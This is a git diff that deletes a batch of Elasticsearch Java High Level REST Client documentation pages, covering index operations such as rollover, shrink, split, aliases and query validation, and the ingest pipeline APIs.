100644 index 29db206bf14..00000000000 --- a/docs/java-rest/high-level/indices/reload_analyzers.asciidoc +++ /dev/null @@ -1,50 +0,0 @@ --- -:api: reload-analyzers -:request: ReloadAnalyzersRequest -:response: ReloadAnalyzersResponse --- - -[id="{upid}-{api}"] -=== Reload Search Analyzers API - -[id="{upid}-{api}-request"] -==== Reload Search Analyzers Request - -An +{request}+ requires an `index` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index to reload - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Reload Search Analyzers Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Shard statistics. Note that reloading does not happen on each shard of an -index, but once on each node the index has shards on. The reported shard count -can therefore differ from the number of index shards -<2> Reloading details of all indices the request was executed on -<3> Details can be retrieved by index name -<4> The reloaded index name -<5> The nodes the index was reloaded on -<6> The analyzer names that were reloaded diff --git a/docs/java-rest/high-level/indices/rollover.asciidoc b/docs/java-rest/high-level/indices/rollover.asciidoc deleted file mode 100644 index 6b7a82a11ae..00000000000 --- a/docs/java-rest/high-level/indices/rollover.asciidoc +++ /dev/null @@ -1,97 +0,0 @@ --- -:api: rollover-index -:request: RolloverRequest -:response: RolloverResponse --- - -[id="{upid}-{api}"] -=== Rollover Index API - -[id="{upid}-{api}-request"] -==== Rollover Request - -The Rollover Index API requires a +{request}+ instance. -A +{request}+ requires two string arguments at construction time, and -one or more conditions that determine when the index has to be rolled over: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The alias (first argument) that points to the index to rollover, and -the name of the new index in case the rollover operation is performed. 
-The new index argument is optional, and can be set to null -<2> Condition on the age of the index -<3> Condition on the number of documents in the index -<4> Condition on the size of the index - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-dryRun] --------------------------------------------------- -<1> Whether the rollover should be performed (default) or only simulated - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-waitForActiveShards] --------------------------------------------------- -<1> Sets the number of active shard copies to wait for before the rollover -index API returns a response -<2> Resets the number of active shard copies to wait for to the default value - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-settings] --------------------------------------------------- -<1> Add the settings to apply to the new index, which include the number of -shards to create for it - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-mapping] --------------------------------------------------- -<1> Add the mappings to associate the new index with. 
See <> -for examples on the different ways to provide mappings - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-alias] --------------------------------------------------- -<1> Add the aliases to associate the new index with - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Rollover Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates whether the requisite number of shard copies were started for -each shard in the index before timing out -<3> The name of the old index, eventually rolled over -<4> The name of the new index -<5> Whether the index has been rolled over -<6> Whether the operation was performed or it was a dry run -<7> The different conditions and whether they were matched or not diff --git a/docs/java-rest/high-level/indices/shrink_index.asciidoc b/docs/java-rest/high-level/indices/shrink_index.asciidoc deleted file mode 100644 index 2ec480cadd2..00000000000 --- a/docs/java-rest/high-level/indices/shrink_index.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ --- -:api: shrink-index -:request: ResizeRequest -:response: ResizeResponse --- - -[id="{upid}-{api}"] -=== Shrink Index API - -[id="{upid}-{api}-request"] -==== Resize Request - -The Shrink API requires a +{request}+ instance. -A +{request}+ requires two string arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The target index (first argument) to shrink the source index (second argument) into - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-waitForActiveShards] --------------------------------------------------- -<1> The number of active shard copies to wait for before the shrink index API -returns a response, as an `int` -<2> The number of active shard copies to wait for before the shrink index API -returns a response, as an `ActiveShardCount` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-settings] --------------------------------------------------- -<1> The number of 
shards on the target of the shrink index request -<2> Remove the allocation requirement copied from the source index - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aliases] --------------------------------------------------- -<1> The aliases to associate the target index with - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Shrink Index Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates whether the requisite number of shard copies were started for -each shard in the index before timing out - - diff --git a/docs/java-rest/high-level/indices/simulate_index_template.asciidoc b/docs/java-rest/high-level/indices/simulate_index_template.asciidoc deleted file mode 100644 index 4dc4429ea8a..00000000000 --- a/docs/java-rest/high-level/indices/simulate_index_template.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ --- -:api: simulate-index-template -:request: SimulateIndexTemplateRequest -:response: SimulateIndexTemplateResponse --- - -[id="{upid}-{api}"] -=== Simulate Index Template API - -[id="{upid}-{api}-request"] -==== Simulate Index Template Request - -A +{request}+ specifies the `indexName` to simulate matching against the -templates in the system. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the index -<2> Optionally, defines a new template - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Simulate Index Template Response - -The returned +{response}+ includes a resolved `Template` object containing -the resolved settings, mappings and aliases of the index template that matched -and would be applied to the index with the provided name (if any). It will -also return a `Map` of index templates (both legacy and composable) names and their -corresponding index patterns: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Resolved template configuration that would be applied when creating the index with the provided name -<2> Overlapping index templates and their corresponding index patterns diff --git a/docs/java-rest/high-level/indices/split_index.asciidoc b/docs/java-rest/high-level/indices/split_index.asciidoc deleted file mode 100644 index c142b2ed9e1..00000000000 --- a/docs/java-rest/high-level/indices/split_index.asciidoc +++ /dev/null @@ -1,80 +0,0 @@ --- -:api: split-index -:request: ResizeRequest -:response: ResizeResponse --- - -[id="{upid}-{api}"] -=== Split Index API - -[id="{upid}-{api}-request"] -==== Resize Request - -The Split API requires a +{request}+ instance. 
-A +{request}+ requires two string arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The target index (first argument) to split the source index (second argument) into -<2> The resize type needs to be set to `SPLIT` - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-waitForActiveShards] --------------------------------------------------- -<1> The number of active shard copies to wait for before the split index API -returns a response, as an `int` -<2> The number of active shard copies to wait for before the split index API -returns a response, as an `ActiveShardCount` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-settings] --------------------------------------------------- -<1> The settings to apply to the target index, which include the number of -shards to create for it - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aliases] --------------------------------------------------- -<1> The aliases to associate the target index with - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Split Index Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates whether the requisite number of shard copies were started for -each shard in the index before timing out - - diff --git a/docs/java-rest/high-level/indices/templates_exist.asciidoc b/docs/java-rest/high-level/indices/templates_exist.asciidoc deleted file mode 100644 index c89627c43c1..00000000000 --- a/docs/java-rest/high-level/indices/templates_exist.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ --- -:api: templates-exist -:request: IndexTemplatesExistRequest -:response: Boolean --- - -[id="{upid}-{api}"] -=== Templates Exist API - -[id="{upid}-{api}-request"] -==== Templates Exist Request - -The Templates Exist API uses +{request}+ as its request object. One or more -index template names can be provided at construction. 
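
As a quick, hedged sketch (the `client` variable, an existing `RestHighLevelClient`, and the template name are assumptions), the existence check pairs naturally with template creation; the tagged snippet below shows the documented request:

["source","java"]
--------------------------------------------------
import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.indices.IndexTemplatesExistRequest;

// Check for a (made-up) template name before trying to create it.
IndexTemplatesExistRequest request = new IndexTemplatesExistRequest("my-logs-template");
boolean exists = client.indices().existsTemplate(request, RequestOptions.DEFAULT);
--------------------------------------------------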
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> A single index template name -<2> Multiple index template names -<3> An index template name using wildcard - -==== Optional arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-optionals] --------------------------------------------------- -<1> If `true`, reads templates from the node's local cluster state. Otherwise -reads from the cluster state of the elected master node -<2> Timeout to connect to the master node as a `TimeValue` -<3> Timeout to connect to the master node as a `String` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The response is a +{response}+ value, `true` if any of the request's template -names match existing templates and `false` otherwise \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/unfreeze_index.asciidoc b/docs/java-rest/high-level/indices/unfreeze_index.asciidoc deleted file mode 100644 index 27e98581f0c..00000000000 --- a/docs/java-rest/high-level/indices/unfreeze_index.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ --- -:api: unfreeze-index -:request: UnfreezeIndexRequest -:response: UnfreezeIndexResponse --- -[id="{upid}-{api}"] -=== Unfreeze Index API - -[id="{upid}-{api}-request"] -==== Unfreeze Index Request - -An +{request}+ requires an `index` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index to unfreeze - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is frozen -as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-waitForActiveShards] --------------------------------------------------- -<1> The number of active shard copies to wait for before the unfreeze index API -returns a response, as an `ActiveShardCount` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Unfreeze Index Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- 
-include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates whether the requisite number of shard copies were started for -each shard in the index before timing out diff --git a/docs/java-rest/high-level/indices/update_aliases.asciidoc b/docs/java-rest/high-level/indices/update_aliases.asciidoc deleted file mode 100644 index 964f66d4bcd..00000000000 --- a/docs/java-rest/high-level/indices/update_aliases.asciidoc +++ /dev/null @@ -1,68 +0,0 @@ --- -:api: update-aliases -:request: IndicesAliasesRequest -:response: IndicesAliasesResponse --- - -[id="{upid}-{api}"] -=== Index Aliases API - -[id="{upid}-{api}-request"] -==== Indices Aliases Request - -The Index Aliases API allows aliasing an index with a name, with all APIs -automatically converting the alias name to the actual index name. - -An +{request}+ must have at least one `AliasActions`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Creates an `IndicesAliasesRequest` -<2> Creates an `AliasActions` that aliases index `test1` with `alias1` -<3> Adds the alias action to the request - -The following action types are supported: `add` - alias an index, `remove` - -removes the alias associated with the index, and `remove_index` - deletes the -index. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request2] --------------------------------------------------- -<1> Creates an alias `alias1` with an optional filter on field `year` -<2> Creates an alias `alias2` associated with two indices and with an optional routing -<3> Removes the associated alias `alias3` -<4> `remove_index` is just like <> - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the operation as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the operation as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Indices Aliases Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/validate_query.asciidoc b/docs/java-rest/high-level/indices/validate_query.asciidoc deleted file mode 100644 index 920e5cf4354..00000000000 --- a/docs/java-rest/high-level/indices/validate_query.asciidoc +++ /dev/null @@ -1,83 +0,0 
@@ --- -:api: indices-validate-query -:request: ValidateQueryRequest -:response: ValidateQueryResponse --- - -[id="{upid}-{api}"] -=== Validate Query API - -[id="{upid}-{api}-request"] -==== Validate Query Request - -A +{request}+ requires one or more `indices` on which the query is validated. If no index -is provided the request is executed on all indices. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index on which to run the request. - -In addition it also needs the query that needs to be validated. The query can be built using the `QueryBuilders` utility class. -The following code snippet builds a sample boolean query. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-query] --------------------------------------------------- -<1> Build the desired query. -<2> Set it to the request. - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-explain] --------------------------------------------------- -<1> The explain parameter can be set to true to get more detailed information about why a query failed - -By default, the request is executed on a single shard only, which is randomly selected. The detailed explanation of -the query may depend on which shard is being hit, and therefore may vary from one request to another. So, in case of -query rewrite the `allShards` parameter should be used to get response from all available shards. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-allShards] --------------------------------------------------- -<1> Set the allShards parameter. - -When the query is valid, the explanation defaults to the string representation of that query. With rewrite set to true, -the explanation is more detailed showing the actual Lucene query that will be executed - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-rewrite] --------------------------------------------------- -<1> Set the rewrite parameter. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Validate Query Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Check if the query is valid or not. -<2> Get total number of shards. -<3> Get number of shards that were successful. -<4> Get number of shards that failed. -<5> Get the shard failures as `DefaultShardOperationFailedException`. -<6> Get the index of a failed shard. -<7> Get the shard id of a failed shard. -<8> Get the reason for shard failure. -<9> Get the detailed explanation for the shards (if explain was set to `true`). -<10> Get the index to which a particular explanation belongs. -<11> Get the shard id to which a particular explanation belongs. -<12> Get the actual explanation string. 
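Putting the pieces above together, a hypothetical end-to-end sketch (the index, field, and value are made up):

[source,java]
--------------------------------------------------
ValidateQueryRequest request = new ValidateQueryRequest("my-index");   // hypothetical index
request.query(QueryBuilders.boolQuery()
        .must(QueryBuilders.matchQuery("user", "kimchy")));            // hypothetical query
request.explain(true);                                                 // ask for a detailed explanation
request.allShards(true);                                               // validate on all shards
ValidateQueryResponse response = client.indices().validateQuery(request, RequestOptions.DEFAULT);
boolean valid = response.isValid();
--------------------------------------------------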
\ No newline at end of file diff --git a/docs/java-rest/high-level/ingest/delete_pipeline.asciidoc b/docs/java-rest/high-level/ingest/delete_pipeline.asciidoc deleted file mode 100644 index 3801f8a3b52..00000000000 --- a/docs/java-rest/high-level/ingest/delete_pipeline.asciidoc +++ /dev/null @@ -1,80 +0,0 @@ -[[java-rest-high-ingest-delete-pipeline]] -=== Delete Pipeline API - -[[java-rest-high-ingest-delete-pipeline-request]] -==== Delete Pipeline Request - -A `DeletePipelineRequest` requires a pipeline `id` to delete. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[delete-pipeline-request] --------------------------------------------------- -<1> The pipeline id to delete - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[delete-pipeline-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the pipeline deletion as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the pipeline deletion as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[delete-pipeline-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-ingest-delete-pipeline-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[delete-pipeline-execute] --------------------------------------------------- -<1> Execute the request and get back the response in a `WritePipelineResponse` object. - -[[java-rest-high-ingest-delete-pipeline-async]] -==== Asynchronous Execution - -The asynchronous execution of a delete pipeline request requires both the `DeletePipelineRequest` -instance and an `ActionListener` instance to be passed to the asynchronous -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[delete-pipeline-execute-async] --------------------------------------------------- -<1> The `DeletePipelineRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `WritePipelineResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[delete-pipeline-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. 
The raised exception is provided as an argument - -[[java-rest-high-ingest-delete-pipeline-response]] -==== Delete Pipeline Response - -The returned `WritePipelineResponse` allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[delete-pipeline-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request diff --git a/docs/java-rest/high-level/ingest/get_pipeline.asciidoc b/docs/java-rest/high-level/ingest/get_pipeline.asciidoc deleted file mode 100644 index 54ba545d709..00000000000 --- a/docs/java-rest/high-level/ingest/get_pipeline.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ -[[java-rest-high-ingest-get-pipeline]] -=== Get Pipeline API - -[[java-rest-high-ingest-get-pipeline-request]] -==== Get Pipeline Request - -A `GetPipelineRequest` requires one or more `pipelineIds` to fetch. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[get-pipeline-request] --------------------------------------------------- -<1> The pipeline id to fetch - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[get-pipeline-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-ingest-get-pipeline-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[get-pipeline-execute] --------------------------------------------------- -<1> Execute the request and get back the response in a GetPipelineResponse object. - -[[java-rest-high-ingest-get-pipeline-async]] -==== Asynchronous Execution - -The asynchronous execution of a get pipeline request requires both the `GetPipelineRequest` -instance and an `ActionListener` instance to be passed to the asynchronous -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[get-pipeline-execute-async] --------------------------------------------------- -<1> The `GetPipelineRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `GetPipelineResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[get-pipeline-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. 
The raised exception is provided as an argument - -[[java-rest-high-ingest-get-pipeline-response]] -==== Get Pipeline Response - -The returned `GetPipelineResponse` allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[get-pipeline-response] --------------------------------------------------- -<1> Check if a matching pipeline id was found or not. -<2> Get the list of pipelines found as a list of `PipelineConfig` objects. -<3> Get the individual configuration of each pipeline as a `Map`. diff --git a/docs/java-rest/high-level/ingest/put_pipeline.asciidoc b/docs/java-rest/high-level/ingest/put_pipeline.asciidoc deleted file mode 100644 index 12a4eb15bce..00000000000 --- a/docs/java-rest/high-level/ingest/put_pipeline.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ -[[java-rest-high-ingest-put-pipeline]] -=== Put Pipeline API - -[[java-rest-high-ingest-put-pipeline-request]] -==== Put Pipeline Request - -A `PutPipelineRequest` requires an `id` argument, a source and a `XContentType`. The source consists -of a description and a list of `Processor` objects. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[put-pipeline-request] --------------------------------------------------- -<1> The pipeline id -<2> The source for the pipeline as a `ByteArray`. -<3> The XContentType for the pipeline source supplied above. - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[put-pipeline-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the pipeline creation as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the pipeline creation as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[put-pipeline-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-ingest-put-pipeline-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[put-pipeline-execute] --------------------------------------------------- -<1> Execute the request and get back the response in a WritePipelineResponse object. 
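For illustration, a sketch of what building and executing such a request might look like; the pipeline id and body are made up, and the response type is shown as `AcknowledgedResponse`, which newer clients return in place of `WritePipelineResponse`:

[source,java]
--------------------------------------------------
String source =
    "{\"description\":\"my test pipeline\"," +
    "\"processors\":[{\"set\":{\"field\":\"foo\",\"value\":\"bar\"}}]}";
PutPipelineRequest request = new PutPipelineRequest(
        "my-pipeline-id",                                          // hypothetical pipeline id
        new BytesArray(source.getBytes(StandardCharsets.UTF_8)),   // pipeline definition
        XContentType.JSON);
AcknowledgedResponse response = client.ingest().putPipeline(request, RequestOptions.DEFAULT);
boolean acknowledged = response.isAcknowledged();
--------------------------------------------------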
- -[[java-rest-high-ingest-put-pipeline-async]] -==== Asynchronous Execution - -The asynchronous execution of a put pipeline request requires both the `PutPipelineRequest` -instance and an `ActionListener` instance to be passed to the asynchronous -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[put-pipeline-execute-async] --------------------------------------------------- -<1> The `PutPipelineRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `WritePipelineResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[put-pipeline-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[[java-rest-high-ingest-put-pipeline-response]] -==== Put Pipeline Response - -The returned `WritePipelineResponse` allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[put-pipeline-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request diff --git a/docs/java-rest/high-level/ingest/simulate_pipeline.asciidoc b/docs/java-rest/high-level/ingest/simulate_pipeline.asciidoc deleted file mode 100644 index 9d1bbd06ceb..00000000000 --- a/docs/java-rest/high-level/ingest/simulate_pipeline.asciidoc +++ /dev/null @@ -1,90 +0,0 @@ -[[java-rest-high-ingest-simulate-pipeline]] -=== Simulate Pipeline API - -[[java-rest-high-ingest-simulate-pipeline-request]] -==== Simulate Pipeline Request - -A `SimulatePipelineRequest` requires a source and a `XContentType`. The source consists -of the request body. See the https://www.elastic.co/guide/en/elasticsearch/reference/master/simulate-pipeline-api.html[docs] -for more details on the request body. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[simulate-pipeline-request] --------------------------------------------------- -<1> The request body as a `ByteArray`. -<2> The XContentType for the request body supplied above. - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[simulate-pipeline-request-pipeline-id] --------------------------------------------------- -<1> You can either specify an existing pipeline to execute against the provided documents, or supply a -pipeline definition in the body of the request. This option sets the id for an existing pipeline. 
